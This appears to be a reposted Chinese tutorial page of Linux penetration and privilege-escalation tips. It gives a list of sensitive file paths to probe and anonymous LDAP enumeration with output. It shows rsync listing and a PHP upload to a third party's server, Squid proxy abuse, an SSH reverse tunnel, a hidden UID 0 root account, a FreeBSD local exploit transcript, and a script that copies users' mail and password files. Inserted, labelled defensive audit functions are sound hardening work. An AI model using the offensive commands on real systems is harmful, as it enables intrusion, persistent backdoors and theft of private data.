
Linux penetration and privilege-escalation tips

XAMPP tutorials | 中文小张 | 1248 views | 0 comments

Some common file paths on Linux systems:

/etc/passwd
/etc/shadow
/etc/fstab
/etc/host.conf
/etc/motd
/etc/ld.so.conf
/var/www/htdocs/index.php
/var/www/conf/httpd.conf
/var/www/htdocs/index.html
/var/httpd/conf/php.ini
/var/httpd/htdocs/index.php
/var/httpd/conf/httpd.conf
/var/httpd/htdocs/index.html
/var/www/index.html
/var/www/index.php
/opt/www/conf/httpd.conf
/opt/www/htdocs/index.php
/opt/www/htdocs/index.html
/usr/local/apache/htdocs/index.html
/usr/local/apache/htdocs/index.php
/usr/local/apache2/htdocs/index.html
/usr/local/apache2/htdocs/index.php
/usr/local/httpd2.2/htdocs/index.php
/usr/local/httpd2.2/htdocs/index.html
/tmp/apache/htdocs/index.html
/tmp/apache/htdocs/index.php
/etc/httpd/htdocs/index.php
/etc/httpd/conf/httpd.conf
/etc/httpd/htdocs/index.html
/www/php/php.ini
/www/php4/php.ini
/www/php5/php.ini
/www/conf/httpd.conf
/www/htdocs/index.php
/www/htdocs/index.html
/usr/local/httpd/conf/httpd.conf
/apache/apache/conf/httpd.conf
/apache/apache2/conf/httpd.conf
/etc/apache/apache.conf
/etc/apache2/apache.conf
/etc/apache/httpd.conf
/etc/apache2/httpd.conf
/etc/apache2/vhosts.d/00_default_vhost.conf
/etc/apache2/sites-available/default
/etc/phpmyadmin/config.inc.php
/etc/mysql/my.cnf
/etc/httpd/conf.d/php.conf
/etc/httpd/conf.d/httpd.conf
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/etc/httpd/logs/access_log
/etc/httpd/logs/access.log
/home/apache/conf/httpd.conf
/home/apache2/conf/httpd.conf
/var/log/apache/error_log
/var/log/apache/error.log
/var/log/apache/access_log
/var/log/apache/access.log
/var/log/apache2/error_log
/var/log/apache2/error.log
/var/log/apache2/access_log
/var/log/apache2/access.log
/var/www/logs/error_log
/var/www/logs/error.log
/var/www/logs/access_log
/var/www/logs/access.log
/usr/local/apache/logs/error_log
/usr/local/apache/logs/error.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/var/log/error_log
/var/log/error.log
/var/log/access_log
/var/log/access.log
/usr/local/apache/logs/access_log.old
/usr/local/apache/logs/error_log.old
/etc/php.ini
/bin/php.ini
/etc/init.d/httpd
/etc/init.d/mysql
/etc/httpd/php.ini
/usr/lib/php.ini
/usr/lib/php/php.ini
/usr/local/etc/php.ini
/usr/local/lib/php.ini
/usr/local/php/lib/php.ini
/usr/local/php4/lib/php.ini
/usr/local/php4/php.ini
/usr/local/php5/lib/php.ini
/usr/local/php5/etc/php.ini
/usr/local/php5/php5.ini
/usr/local/apache/conf/php.ini
/usr/local/apache/conf/httpd.conf
/usr/local/apache2/conf/httpd.conf
/usr/local/apache2/conf/php.ini
/etc/php4.4/fcgi/php.ini
/etc/php4/apache/php.ini
/etc/php4/apache2/php.ini
/etc/php5/apache/php.ini
/etc/php5/apache2/php.ini
/etc/php/php.ini
/etc/php/php4/php.ini
/etc/php/apache/php.ini
/etc/php/apache2/php.ini
/web/conf/php.ini
/usr/local/Zend/etc/php.ini
/opt/xampp/etc/php.ini
/var/local/www/conf/php.ini
/var/local/www/conf/httpd.conf
/etc/php/cgi/php.ini
/etc/php4/cgi/php.ini
/etc/php5/cgi/php.ini
/php5/php.ini
/php4/php.ini
/php/php.ini
/PHP/php.ini
/apache/php/php.ini
/xampp/apache/bin/php.ini
/xampp/apache/conf/httpd.conf
/NetServer/bin/stable/apache/php.ini
/home2/bin/stable/apache/php.ini
/home/bin/stable/apache/php.ini
/var/log/mysql/mysql-bin.log
/var/log/mysql.log
/var/log/mysqlderror.log
/var/log/mysql/mysql.log
/var/log/mysql/mysql-slow.log
/var/mysql.log
/var/lib/mysql/my.cnf
/usr/local/mysql/my.cnf
/usr/local/mysql/bin/mysql
/etc/my.cnf
/usr/local/cpanel/logs
/usr/local/cpanel/logs/stats_log
/usr/local/cpanel/logs/access_log
/usr/local/cpanel/logs/error_log
/usr/local/cpanel/logs/license_log
/usr/local/cpanel/logs/login_log
/usr/local/share/examples/php4/php.ini
/usr/local/share/examples/php/php.ini
/usr/local/tomcat5527/bin/version.sh
/usr/share/tomcat6/bin/startup.sh
/usr/tomcat6/bin/startup.sh
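For a defender the list above is an audit target: which of these files actually exist on a host, and which of them are readable by every local account. The shell function below is an added example, not part of the original post. It reads paths one per line on stdin and prints those that exist as regular files with the world-read bit set; the temporary files created by the demo function are constructed for this example, and the function names are this example's own.

```shell
#!/bin/sh
# Added example (not from the original post): audit which of the paths listed
# above exist on this host and are readable by every local account.
# Usage: printf '%s\n' /etc/mysql/my.cnf /etc/phpmyadmin/config.inc.php | world_readable_files

# Read paths one per line on stdin; print those that exist as regular files
# and carry the world-read bit. -perm -004 is the portable (octal) spelling of
# "other has read"; -prune keeps find from descending if a directory slips in.
world_readable_files() {
    while IFS= read -r p; do
        [ -n "$p" ] || continue
        [ -f "$p" ] || continue            # missing path or not a regular file
        find "$p" -prune -type f -perm -004 -print
    done
}

# Number of findings for a list passed as one newline-separated string.
count_world_readable() {
    printf '%s\n' "$1" | world_readable_files | wc -l | tr -d ' '
}

# Self-contained demonstration on constructed files: one config left at 0644
# (what a default umask produces), one tightened to 0600, plus a missing path.
demo_world_readable() {
    d=$(mktemp -d)
    printf 'db_password=constructed\n' > "$d/config.inc.php"; chmod 0644 "$d/config.inc.php"
    printf 'db_password=constructed\n' > "$d/my.cnf";         chmod 0600 "$d/my.cnf"
    printf '%s\n' "$d/config.inc.php" "$d/my.cnf" "$d/missing.ini" | world_readable_files
    rm -rf "$d"
}
```

Feed the list above through `world_readable_files` on a host to get the subset worth looking at. Some entries (`/etc/passwd`, `/etc/motd`) are world-readable by design; the findings that matter are configuration files that embed credentials (`my.cnf`, `config.inc.php`, `php.ini` with database settings) and web server logs readable by unprivileged accounts.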

LDAP tips:

cat /etc/nsswitch.conf

Check the passwd/shadow lookup policy; here it shows that the "files ldap" mode is in use.

less /etc/ldap.conf

base ou=People,dc=unix-center,dc=net

Note the ou and dc values (the search base).

Look up the administrator entry.

Anonymous bind:

ldapsearch -x -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b "cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2

With a password (prompted):

ldapsearch -x -W -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b "cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2

Retrieve 10 user records (-z limits the number of results, -p sets the port):

ldapsearch -h 192.168.2.2 -x -z 10 -p <port>

 

Worked example:

1. Return all entries and their attributes

ldapsearch -h 192.168.7.33 -b "dc=ruc,dc=edu,dc=cn" -s sub "objectclass=*"

version: 1
dn: dc=ruc,dc=edu,dc=cn
dc: ruc
objectClass: domain

dn: uid=manager,dc=ruc,dc=edu,dc=cn
uid: manager
objectClass: inetOrgPerson
objectClass: organizationalPerson
objectClass: person
objectClass: top
sn: manager
cn: manager

dn: uid=superadmin,dc=ruc,dc=edu,dc=cn
uid: superadmin
objectClass: inetOrgPerson
objectClass: organizationalPerson
objectClass: person
objectClass: top
sn: superadmin
cn: superadmin

dn: uid=admin,dc=ruc,dc=edu,dc=cn
uid: admin
objectClass: inetOrgPerson
objectClass: organizationalPerson
objectClass: person
objectClass: top
sn: admin
cn: admin

dn: uid=dcp_anonymous,dc=ruc,dc=edu,dc=cn
uid: dcp_anonymous
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: inetOrgPerson
sn: dcp_anonymous
cn: dcp_anonymous

2. View the base entry only

bash-3.00# ldapsearch -h 192.168.7.33 -b "dc=ruc,dc=edu,dc=cn" -s base "objectclass=*" | more
version: 1
dn: dc=ruc,dc=edu,dc=cn
dc: ruc
objectClass: domain

 

3. Search with an empty base (the root DSE)

bash-3.00# ldapsearch -h 192.168.7.33 -b "" -s base "objectclass=*"

version: 1
dn:
objectClass: top
namingContexts: dc=ruc,dc=edu,dc=cn
supportedExtension: 2.16.840.1.113730.3.5.7
supportedExtension: 2.16.840.1.113730.3.5.8
supportedExtension: 1.3.6.1.4.1.4203.1.11.1
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.25
supportedExtension: 2.16.840.1.113730.3.5.3
supportedExtension: 2.16.840.1.113730.3.5.5
supportedExtension: 2.16.840.1.113730.3.5.6
supportedExtension: 2.16.840.1.113730.3.5.4
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.1
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.2
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.3
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.4
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.5
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.6
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.7
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.8
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.9
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.23
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.11
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.12
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.13
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.14
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.15
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.16
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.17
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.18
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.19
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.21
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.22
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.24
supportedExtension: 1.3.6.1.4.1.1466.20037
supportedExtension: 1.3.6.1.4.1.4203.1.11.3
supportedControl: 2.16.840.1.113730.3.4.2
supportedControl: 2.16.840.1.113730.3.4.3
supportedControl: 2.16.840.1.113730.3.4.4
supportedControl: 2.16.840.1.113730.3.4.5
supportedControl: 1.2.840.113556.1.4.473
supportedControl: 2.16.840.1.113730.3.4.9
supportedControl: 2.16.840.1.113730.3.4.16
supportedControl: 2.16.840.1.113730.3.4.15
supportedControl: 2.16.840.1.113730.3.4.17
supportedControl: 2.16.840.1.113730.3.4.19
supportedControl: 1.3.6.1.4.1.42.2.27.9.5.2
supportedControl: 1.3.6.1.4.1.42.2.27.9.5.6
supportedControl: 1.3.6.1.4.1.42.2.27.9.5.8
supportedControl: 1.3.6.1.4.1.42.2.27.8.5.1
supportedControl: 1.3.6.1.4.1.42.2.27.8.5.1
supportedControl: 2.16.840.1.113730.3.4.14
supportedControl: 1.3.6.1.4.1.1466.29539.12
supportedControl: 2.16.840.1.113730.3.4.12
supportedControl: 2.16.840.1.113730.3.4.18
supportedControl: 2.16.840.1.113730.3.4.13
supportedSASLMechanisms: EXTERNAL
supportedSASLMechanisms: DIGEST-MD5
supportedLDAPVersion: 2
supportedLDAPVersion: 3
vendorName: Sun Microsystems, Inc.
vendorVersion: Sun-Java(tm)-System-Directory/6.2
dataversion: 020090516011411
netscapemdsuffix: cn=ldap://dc=webA:389
supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA
supportedSSLCiphers: TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA
supportedSSLCiphers: TLS_DHE_RSA_WITH_AES_256_CBC_SHA
supportedSSLCiphers: TLS_DHE_DSS_WITH_AES_256_CBC_SHA
supportedSSLCiphers: TLS_ECDH_RSA_WITH_AES_256_CBC_SHA
supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA
supportedSSLCiphers: TLS_RSA_WITH_AES_256_CBC_SHA
supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_RC4_128_SHA
supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA
supportedSSLCiphers: TLS_ECDHE_RSA_WITH_RC4_128_SHA
supportedSSLCiphers: TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA
supportedSSLCiphers: TLS_DHE_DSS_WITH_RC4_128_SHA
supportedSSLCiphers: TLS_DHE_RSA_WITH_AES_128_CBC_SHA
supportedSSLCiphers: TLS_DHE_DSS_WITH_AES_128_CBC_SHA
supportedSSLCiphers: TLS_ECDH_RSA_WITH_RC4_128_SHA
supportedSSLCiphers: TLS_ECDH_RSA_WITH_AES_128_CBC_SHA
supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_RC4_128_SHA
supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA
supportedSSLCiphers: SSL_RSA_WITH_RC4_128_MD5
supportedSSLCiphers: SSL_RSA_WITH_RC4_128_SHA
supportedSSLCiphers: TLS_RSA_WITH_AES_128_CBC_SHA
supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_3DES_EDE_CBC_SHA
supportedSSLCiphers: TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA
supportedSSLCiphers: SSL_DHE_RSA_WITH_3DES_EDE_CBC_SHA
supportedSSLCiphers: SSL_DHE_DSS_WITH_3DES_EDE_CBC_SHA
supportedSSLCiphers: TLS_ECDH_RSA_WITH_3DES_EDE_CBC_SHA
supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_3DES_EDE_CBC_SHA
supportedSSLCiphers: SSL_RSA_FIPS_WITH_3DES_EDE_CBC_SHA
supportedSSLCiphers: SSL_RSA_WITH_3DES_EDE_CBC_SHA
supportedSSLCiphers: SSL_DHE_RSA_WITH_DES_CBC_SHA
supportedSSLCiphers: SSL_DHE_DSS_WITH_DES_CBC_SHA
supportedSSLCiphers: SSL_RSA_FIPS_WITH_DES_CBC_SHA
supportedSSLCiphers: SSL_RSA_WITH_DES_CBC_SHA
supportedSSLCiphers: TLS_RSA_EXPORT1024_WITH_RC4_56_SHA
supportedSSLCiphers: TLS_RSA_EXPORT1024_WITH_DES_CBC_SHA
supportedSSLCiphers: SSL_RSA_EXPORT_WITH_RC4_40_MD5
supportedSSLCiphers: SSL_RSA_EXPORT_WITH_RC2_CBC_40_MD5
supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_NULL_SHA
supportedSSLCiphers: TLS_ECDHE_RSA_WITH_NULL_SHA
supportedSSLCiphers: TLS_ECDH_RSA_WITH_NULL_SHA
supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_NULL_SHA
supportedSSLCiphers: SSL_RSA_WITH_NULL_SHA
supportedSSLCiphers: SSL_RSA_WITH_NULL_MD5
supportedSSLCiphers: SSL_CK_RC4_128_WITH_MD5
supportedSSLCiphers: SSL_CK_RC2_128_CBC_WITH_MD5
supportedSSLCiphers: SSL_CK_DES_192_EDE3_CBC_WITH_MD5
supportedSSLCiphers: SSL_CK_DES_64_CBC_WITH_MD5
supportedSSLCiphers: SSL_CK_RC4_128_EXPORT40_WITH_MD5
supportedSSLCiphers: SSL_CK_RC2_128_CBC_EXPORT40_WITH_MD5


 

NFS tips:

List the exports of a host:

showmount -e <ip>
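From the defender's side the counterpart of showmount is reviewing /etc/exports for what such a listing would reveal: exports open to any host, exports that keep remote root as uid 0, and the exports(5) mistake of a space before the option list. The shell function below is an added example, not part of the original post; the exports file is constructed and the function names are this example's own.

```shell
#!/bin/sh
# Added example (not from the original post): review /etc/exports for what a
# "showmount -e" listing would reveal.

# Constructed /etc/exports. The last line shows the classic exports(5) mistake:
# a space before "(rw)" detaches the options from the host, so they apply to
# everyone.
EXPORTS_SAMPLE='# constructed sample
/srv/share    *(rw,no_root_squash)
/srv/backup   10.0.1.0/24(ro,root_squash,sync)
/home         192.168.1.5(rw)
/srv/wwwroot  10.0.1.7 (rw)'

# Read exports(5) syntax on stdin; print "<path> <client>: <issue>" per finding.
exports_audit() {
    awk '
    /^[ \t]*#/ || /^[ \t]*$/ { next }
    {
        path = $1
        for (i = 2; i <= NF; i++) {
            client = $i; opts = ""
            if (match(client, /\(.*\)$/)) {
                opts   = substr(client, RSTART + 1, RLENGTH - 2)
                client = substr(client, 1, RSTART - 1)
            }
            if (client == "") client = "*"       # "(opts)" with no host = every host
            if (client ~ /\*/)
                print path " " client ": exported to any host"
            if (opts ~ /(^|,)no_root_squash(,|$)/)
                print path " " client ": no_root_squash (remote root keeps uid 0)"
            if (client ~ /\*/ && opts ~ /(^|,)rw(,|$)/)
                print path " " client ": writable by any host"
        }
    }'
}

# Number of findings for an exports text passed as $1 (for scripting/monitoring).
exports_finding_count() {
    printf '%s\n' "$1" | exports_audit | wc -l | tr -d ' '
}
```

`exports_audit < /etc/exports` on a file server gives the same picture an outsider gets from showmount, with the dangerous options called out; the wildcard and detached-options cases are the ones that turn a read-only share into an anonymous writable one.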

 

rsync tips:

1. List the modules on an rsync server

rsync 210.51.X.X::

finance
img_finance
auto
img_auto
html_cms
img_cms
ent_cms
ent_img
ceshi
res_img
res_img_c2
chip
chip_c2
ent_icms
games
gamesimg
media
mediaimg
fashion
res-fashion
res-fo
taobao-home
res-taobao-home
house
res-house
res-home
res-edu
res-ent
res-labs
res-news
res-phtv
res-media
home
edu
news
res-book

To see a module's subdirectories (note: the trailing / after the module name is required):

rsync 210.51.X.X::htdocs_app/

rsync 210.51.X.X::auto/

rsync 210.51.X.X::edu/

2. Download files from the rsync server

rsync -avz 210.51.X.X::htdocs_app/ /tmp/app/

3. Upload a file to the rsync server (the upload succeeded; existing files are not overwritten)

rsync -avz nothack.php 210.51.X.X::htdocs_app/warn/

http://app.finance.xxx.com/warn/nothack.txt
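The listing and upload steps above work because an rsyncd module is listable by default (`list` defaults to yes) and a module with `read only = no` and no `auth users` accepts writes from anyone who can reach the port. The shell function below is an added example, not part of the original post: it reads an rsyncd.conf on stdin and reports those conditions per module. The sample configuration and its module names are constructed, and the function name is this example's own.

```shell
#!/bin/sh
# Added example (not from the original post): audit an rsyncd.conf for the
# conditions the listing/upload steps above rely on.

# Constructed rsyncd.conf: one module left at its exposed defaults, one hardened.
RSYNCD_SAMPLE='uid = nobody
[htdocs_app]
    path = /var/www/app
    comment = application docroot
    read only = no

[finance]
    path = /data/finance
    read only = yes
    list = no
    auth users = backup
    hosts allow = 10.0.0.0/8'

# Read rsyncd.conf on stdin; print one finding per line as "<module>: <issue>".
# Checks: listable module, writable without auth users, no hosts allow.
# Keys in the global section before the first [module] are ignored for simplicity.
rsyncd_audit() {
    awk '
    /^[ \t]*\[/ {
        mod = $0; sub(/^[ \t]*\[/, "", mod); sub(/].*$/, "", mod)
        mods[++n] = mod; next
    }
    /^[ \t]*#/ || /^[ \t]*$/ || mod == "" { next }
    /=/ {
        key = $0; sub(/=.*$/, "", key); gsub(/^[ \t]+|[ \t]+$/, "", key)
        val = $0; sub(/^[^=]*=[ \t]*/, "", val); sub(/[ \t]+$/, "", val)
        cfg[mod, tolower(key)] = tolower(val)
    }
    END {
        for (i = 1; i <= n; i++) {
            m = mods[i]
            if (!((m, "list") in cfg) || cfg[m, "list"] != "no")
                print m ": module name is listable (set list = no)"
            if ((m, "read only") in cfg && cfg[m, "read only"] != "yes" \
                && cfg[m, "read only"] != "true" && !((m, "auth users") in cfg))
                print m ": writable but no auth users (anonymous upload)"
            if (!((m, "hosts allow") in cfg))
                print m ": no hosts allow restriction"
        }
    }'
}

# Number of findings for a config text passed as $1.
rsyncd_finding_count() {
    printf '%s\n' "$1" | rsyncd_audit | wc -l | tr -d ' '
}
```

Run `rsyncd_audit < /etc/rsyncd.conf` on the server: a module that shows all three findings is exactly what steps 1 and 3 above discover from the outside. Note that `auth users` only protects against anonymous writes if `secrets file` is set as well, which this check does not verify.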

 

Squid tips:

nc -vv 91ri.org 80

GET http://www.sina.com/ HTTP/1.0

GET http://www.sina.com:22/ HTTP/1.0

 

SSH port forwarding (reverse forward):

ssh -C -f -N -g -R 44:127.0.0.1:22 cnbird@<ip>

 

Joomla tips:

Determine the version:

index.php?option=com_content&view=article&id=30:what-languages-are-supported-by-joomla-15&catid=32:languages&Itemid=47

Password reset:

index.php?option=com_user&view=reset&layout=confirm

 

Adding a root user with UID 0 on Linux:

useradd -o -u 0 nothack
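The detection side of the command above is simple: any account other than root that carries UID 0 is root under another name, so a host check should list such accounts. The shell functions below are an added example, not part of the original post; the passwd excerpt is constructed and the function names are this example's own.

```shell
#!/bin/sh
# Added example (not from the original post): detect the "useradd -o -u 0"
# trick above by listing every UID-0 account that is not root.

# Constructed /etc/passwd excerpt: normal accounts plus a duplicate-UID-0 one.
PASSWD_SAMPLE='root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
nothack:x:0:0::/home/nothack:/bin/bash'

# Login names of every UID-0 account except root, from passwd(5) lines on stdin.
# The comparison is numeric, so a UID written as "00" is still caught.
extra_uid0_accounts() {
    awk -F: '$3 == 0 && $1 != "root" { print $1 }'
}

# Exit 0 when root is the only UID-0 account in $1 (default /etc/passwd);
# print an alert line and exit 1 otherwise, so it can run from cron or a monitor.
check_uid0() {
    f=${1:-/etc/passwd}
    extras=$(extra_uid0_accounts < "$f")
    if [ -n "$extras" ]; then
        printf 'ALERT: extra UID 0 account(s) in %s: %s\n' "$f" "$(printf '%s' "$extras" | tr '\n' ' ')"
        return 1
    fi
    printf 'OK: root is the only UID 0 account in %s\n' "$f"
}
```

`check_uid0` with no argument examines the live /etc/passwd. Pair it with auditing of `useradd`/`usermod` invocations (auditd or shell history) so the creation event is logged, not just the resulting state.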

 

FreeBSD local privilege escalation (session transcript):

[argp@julius ~]$ uname -rsi
freebsd 7.3-RELEASE GENERIC
[argp@julius ~]$ sysctl vfs.usermount
vfs.usermount: 1
[argp@julius ~]$ id
uid=1001(argp) gid=1001(argp) groups=1001(argp)
[argp@julius ~]$ gcc -Wall nfs_mount_ex.c -o nfs_mount_ex
[argp@julius ~]$ ./nfs_mount_ex

calling nmount()

 

Packing a directory with tar:

tar archive:

tar -cvf /home/public_html.tar /home/public_html/ --exclude='*.gif' --exclude='/xx/xx/*'
(--exclude='*.gif' skips files matching the pattern; --exclude='/xx/xx/*' skips a directory)

ALZip (Korean archiver): alzip -a D:\WEB d:\web*.rar

On tar's packing: Linux does not determine a file's type by its extension.

For a compressed archive, tar -ztf x.tar.gz lists the contents and tar -zxf x.tar.gz extracts it.

So this form is preferable:

tar -czf /home/public_html.tar.gz /home/public_html/ --exclude='*.gif' --exclude='/xx/xx/*'

 

System information collection:

for linux:

#!/bin/bash
echo "#######getting sysinfo####"
echo "######usage: ./getinfo.sh >/tmp/sysinfo.txt"
echo "#######basic information##"
cat /proc/meminfo
echo
cat /proc/cpuinfo
echo
rpm -qa 2>/dev/null
######stole the mail......######
cp -a /var/mail /tmp/getmail 2>/dev/null
echo "your id is: $(id)"
echo "###atq&crontab#####"
atq
crontab -l
echo "#####about var#####"
set
echo "#####about network###"
####this is the point in pentest, but i am a new bird, so u need to add some in it
cat /etc/hosts
hostname
ifconfig -a
arp -v
echo "########user####"
cat /etc/passwd | grep -i sh
echo "######service####"
chkconfig --list
for i in {oracle,mysql,tomcat,samba,apache,ftp}
do
    cat /etc/passwd | grep -i "$i"
done
locate passwd >/tmp/password 2>/dev/null
sleep 5
locate password >>/tmp/password 2>/dev/null
sleep 5
locate conf >/tmp/sysconfig 2>/dev/null
sleep 5
locate config >>/tmp/sysconfig 2>/dev/null
sleep 5
###maybe can use "tree /"###
echo "##packing up#########"
tar cvf getsysinfo.tar /tmp/getmail /tmp/password /tmp/sysconfig
rm -rf /tmp/getmail /tmp/password /tmp/sysconfig

Source: XAMPP Chinese group official site

When reposting, please credit: XAMPP Chinese group official site » Linux penetration and privilege-escalation tips